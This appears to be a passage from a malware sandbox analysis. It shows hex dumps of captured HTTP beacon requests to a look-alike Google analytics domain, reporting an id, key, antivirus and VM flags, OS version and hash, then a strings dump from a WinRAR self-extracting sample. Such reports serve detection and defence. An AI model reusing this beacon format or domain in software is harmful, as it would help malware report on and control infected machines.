0x000000a0 (00160)   57796732 54683663 59797836 452b6646   Wyg2Th6cYyx6E+fF
0x000000b0 (00176)   36715136 38346a47 437a5758 4f5a3746   6qQ684jGCzWXOZ7F
0x000000c0 (00192)   4d543258 47467373 67685958 76542048   MT2XGFssghYXvT H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36383326   XX0000&key=3683&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796732 54683663 59797836 452b6646   Wyg2Th6cYyx6E+fF
0x000000b0 (00176)   36715136 38346a47 437a5758 4f5a3746   6qQ684jGCzWXOZ7F
0x000000c0 (00192)   4d54325a 78505779 63726c79 6e322048   MT2ZxPWycrlyn2 H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....


Strings
strcatVirtualProtect.
.M.
.
.Q.
...i.
.
.
...
U(e
.:T.Z.
.
.$.
\
.CC
 
l.....
.....................

 1993-%d
Accept
]aY)
Bro&wse...
by Alexander Roshal
bytes
Cancel
&Cancel
Cannot create folder %s
Cannot create %s
Cannot open %s
Close
Confirm file replace
Copyright 
CRC failed in %s
DCRC failed in the encrypted file %s. Corrupt file or wrong password.
Decline
&Destination folder
eRichEdit
ErroraErrors encountered while performing the operation
Extract
Extracting files to %s folder$Extracting files to temporary folder
Extracting from %s
Extracting %s
Extraction progress
File close error
folder is not accessiblelSome files could not be created.
                                 H
         (((((                  H
         h((((                  H
~hRichEdit20W
Install
	jmsctls_progress32
KERNEL32.DLL
License
LICENSEDLG	RENAMEDLG
Look at the information window for more details
modified on
mscoree.dll
MS Shell Dlg 2
Next volume
Not enough memory
No to A&ll
ntdll.dll
Packed data CRC failed in %s
Please close all applications, reboot Windows and restart this installation\Some installation files are corrupt.
Please download a fresh copy and retry the installation
Read error
Rename
&Rename
Rename file
REPLACEFILEDLG
Select destination folder
Skipping %s
STARTDLG
The archive comment is corrupt
The archive header is corrupt
The file "%s" header is corrupt%The archive comment header is corrupt
The following file already exists
The required volume is absent2The archive is either in unknown format or damaged
TITLE_BMP
=Total path and file name length must not exceed %d characters
Unexpected end of archive
Unknown method in %s
WinRAR self-extracting archive
with this one?
Would you like to replace the existing file
Wrong password for %s&Write error. Probably the disk is full
&Yes
Yes to &All
                          
 "" """!
/~/^/~/
.....!
" " """!
"" " "" 
"" "!" 
"" """!
""" " 
""" "  
""" ""!
""" """""
"""" """!
""""" 
""""""
"""""" 
""""""!
""""""" 
""""""""
"""""""""!
""""""""""
""""""""""""
""""""""""""!
""""""""""""""
"""""""""""""""""""!
""""""""""""""""""""
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
0A@@Ju
0=_M"|@
0SSSSS
%1*0Lzy
17>`C2
1Q!LE\q
1;#U"p
{1VEd3
$2" """"
--+,21
2&"6RFBVrfbv
2&"6RFBVrfgv
2&"6RGCWsgbw
2&"6RGCWsgcv
2CK6RFB3
2&Ne''.Vrfbv
"2"R"2"
2RB9]{bRrU
|2zDx"
^3]];;
=3-	0'`%SPmw
$32""""34"
$3"#4"
39#XP DJpy|u
"3B""""$3"
"3B""$3"!
"3B""""""""""C2!
$3B""""""""C4"
$3B""""""C4"
$3B""C4"
3e@u5E;U?
3%j*De
3-K`cBB
3](&P3Z
3W~A	|
3YW(SX18
:4KHGhpy{
4V\)PUq
5 2;_bkG"z
5;"|CmS}idp
5CT$UH%t5$5L1g
5IEiVydW~	
5iZkJ{zKu'
5opuU{yK	Z
5oru'd
5YnZ[H
&"62&"6RFBVrfbv
65z_Ym
6~B6>r
6e\uVEnUv
/}6fM5
&"6^FNV
&=6MF]Vmf}v
6R<BUs
&"6RFBVrfb
+7;%4A
7]4u%c
+7I-9=
(7r'27
8$0Z`T@u`my
84'7f#>?
888888
8!90E@sF
8,DUq*
8[&K4{
8tBJjbl
]+-+=9
9@cuPa`np
*'-9K1
9q3VNygc
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
AeJp~H
@?Aj`&
aljqe	D
alprKeCw
An application has made an attempt to load the C runtime library incorrectly.
ANlsP{Ka(
AoVxfHvX
ARUQ{}	
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
aVI{V	
A*YZ1J
&b6R,B^r?
"Bfy.;
!bH6w$
BJ:9=_{
B>Q&om
bvmAjn
#BVrfLv
bwsgCTPE
bwsg@PZO
BX;p?@F
{bY<2!
BYWz5z'
C2_)&N
"C""4"!
c{6Ctt
CB """"
%)c%F=
%:cjcc
CjYeI 
cksyC[6
C^n:Au
CorExitProcess
CreateWindowExA
- CRT not initialized
Cr~+y"
c|sl&T
cwsd@RV@
CYYE""B
"""" ""D!
@.data
++++++dd
dddd, MMMM dd, yyyy
DDehhH
December
DecodePointer
DefWindowProcA
DeleteCriticalSection
DispatchMessageA
DjTzZtJd:
#dnUHw
dOcM|x
DOMAIN error
dSq^eh@s$
d~tND^U
}E@;<<//
e1,|u}(
E3Uk%65B
-eAu^EnUl
*'ECjs
>eFuPEcU
E+GNZ?gK
eGu\EmUp
EJj+ax
_eJuRE{Uo
+EKEkeke
EKEkEKE
+EKEkEKE+
+EKEkEKE+]
|EL $0I%F
EncodePointer
EnterCriticalSection
+eNuRE{Ud
equ|E3UC%L5,
]Er6NF
/{e?u/
e)u9EI
_e/u?#d#
_e/u?D
_e/u?E
_e*u?E
{e/u?E
+e@u{E
	e	u-E=UM%X5h
.e|uLE\UMl
e<uLG\
e~uNELU,%<5
_e/u?U
%EVU!m
ExitProcess
^fbiRY)I-9=
FBVrfbv
February
feNu>E=UE%15>
[.ff]8F
FF\^'b
FhWydJu[
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Friday
fT&AE)
fV9 $u
F_VZmvF
&,FwW~
,FYFKQns
#f,z(F
))[[)G1x
g=Cy_2
G?dfvW9
GetACP
GetActiveWindow
GetCommandLineA
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetMessageA
GetModuleFileNameA
GetModuleHandleA
GetModuleHandleW
GetOEMCP
GetProcAddress
GetProcessHeap
GetProcessWindowStation
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemMetrics
GetSystemTimeAsFileTime
GetTickCount
GetUserObjectInformationA
GetVersionExA
GGGGG.
GijE`Np^
Gi)(Oj
GJEOB7Z
gpt`E_[M
g+ ]uMEl0C
H0{Pjx
h6 	{9K
HeapAlloc
HeapCreate
HeapFree
HeapReAlloc
HeapSize
heeh$$$
@HE/ET
HH:mm:ss
<=Hl+c
hrNV[`nt
h|xmIZ^J
/)I-9=
I]9I]#d
I9rm8I
}i^de&L
IDM\OT
iF|VrTPD
i*fXB<
IK]\|ew
InitializeCriticalSectionAndSpinCount
InterlockedDecrement
InterlockedIncrement
I.^pNN>
IsDebuggerPresent
IsValidCodePage
IX>PPk(^
iz~jNZ_H
j9p	uL
JanFebMarAprMayJunJulAugSepOctNovDec
January
{<jD.#JemDGejQ
|Jdz~B
jDZOJd
jDZtJd
-je/hU"
j@j ^V
?jJ{zK
jm<^'-5U
JQ''''n 
jQW*?f
!ju)e_#/
JuK&a&p
JWP|RFZ
{jYV>BI
&`k5yxRM6UH'
K9yk#x
KB{?]z
~KBz^uF
kEKEk&"6RFBVrfbv
kernel32.dll
KERNEL32.dll
KME\U,%<5
KpT]%<
K:rV	6
*kzKSJ9
l4+pTIQ
L(`@548
LCMapStringA
LCMapStringW
LcP~gJJd
LeaveCriticalSection
le\EL5'(,7
}LEL~F5
LE\U,%>5
le|u9/
le|uLE
le|uLE\U
le|uLE\U,%<%
le|uLE^U.%4
le|uLE\U,%<5
le|uLE\U,%|5
le|uLE\U,%<5L
le|uLE\U,%<WeweW
le|uLM%U,%<5
lFseDQZL
lL<B6#
LoadLibraryA
l"P|0\
}lR+73_9GNf
L||UcPg
`L|(&x	KC
L$Y>L.
M-+3jxA)
};MdV&-,>
Meq$GS4#'
MessageBoxA
MfEv}F
Microsoft Visual C++ Runtime Library
MM/dd/yy
Monday
m_p; y
mQHA8q
MultiByteToWideChar
MY)I-9=_
nd~tND^T,
nIIX>PPSS
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
N`^pn@~P
N`^poA
@nQxfHwY
`nR8B	F
N`_rmCr\
nse8I\
NWvc/\
'>`|NZb
Oa_rlBs^
October
oe^TPF1
Oe/u?E
oe~uLE
OracleClassEx
OU*ejL?
o~uYn>k\a
,o-vGA
(-oWWW44
;p{hI,0
Please contact the application's support team for more information.
po{wx_
PPPPPPPP
Program: 
<program name unknown>
- pure virtual function call
p!!W44
py\~LE\U,%<5
PY|uPE
Qe5:uDb&
qfbtwb_hO
]qJEf0
=QK|)qm
	^QlHk
[qn\]O
Q====OO,,
QueryPerformanceCounter
QY<A,&
-_r/4<G4
R5@MZv
R{Cs[C
`.rdata
RegisterClassExA
Rp{z@*
RtlUnwind
runtime error 
Runtime Error!
rYe=[9
RYJV3}y
Rzlh{PxM
~RZORn
|	S8A>
s!9$2h
Saturday
September
SetHandleCount
SetLastError
SetUnhandledExceptionFilter
ShowWindow
SING error
-sqQhn9
strstr
Sunday
SunMonTueWedThuFriSat
\SZ7Jszc
:#*SZCJszcj
#*SZCJTz
??TE""B
TerminateProcess
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
Thursday
< tK<	tG
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
TranslateAcceleratorA
TranslateMessage
t"SS9]
t$<"u	3
Tuesday
tu-+I%
;t$,v-
tvpDOd
tvwx4G\up
t+WWVPV
TXPH=f
]t-X\r
TY}tRm
,,,, u
u#)0UB]R4a
\u5E?UIJL5
u8E3;@MY5m
UDeV0g
UD%I4,f
u!E2Ux%U5,
u"E[E;
u%E|UI%
uFEnUX%
@uFS=(C8
ugEOU/
{UkE[uKd:
{UkE[uKe:
UKwW%K67
Ul%|5L
uL-6D,
uLEqUO%L5
Ule|uL
uLE}Uv
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UN%Y5o
UpdateWindow
`uqeARVB
uQ$PC )B3
UQPXY]Y[
URPQQh`VB
USER32.dll
USER32.DLL
Uys!=J
/uZ0E0^
UZ%X5m
!vC4M4,
)VFMh'
vG4a;Q
VirtualAlloc
VirtualFree
v\lAQ~kn0P 
<VlrA%
vm:2i9
v	N+D$
v\sMCrXv
VV_bXa
w4|a)Q
]&W63F&2
W^e|5L
Wednesday
WideCharToMultiByte
wNSlD"
wqHAXQ(
w&"*RBJ
WriteFile
_xbd4Zt
_X$CIFgvoE
x|iM+c
Xl[F	2
xlH\XL
: +;XO
xXcF4=F2%3
XY=C5c
(*Y|&+
)y)13oz
y}9ghTq
y_ak?8W
???>YB
Yd=gvB
Ye'u5E
?Y'I-9
y}i:Y]IY9=)~
>=Yt1j
y!`V)"1
yxbhm3
-/-.z?
Z0N):Q
z1jDZtJd:
/ZCc2$"
zFjDoeJ
zKjZZjJz:
]ZM+zAj
zpE#]|Y
)ZrC	bf
Zs}3:vY
Zt/d:g
zTjDZtJ
zTjDZtJd:
zTj:ZTJD:4*$
ztvmE	
zUjE? &
ZXJXZtJd:
zxkEZGJt:
ZxK	xJi
@Z`z@ZG_&
ZZZZZ2U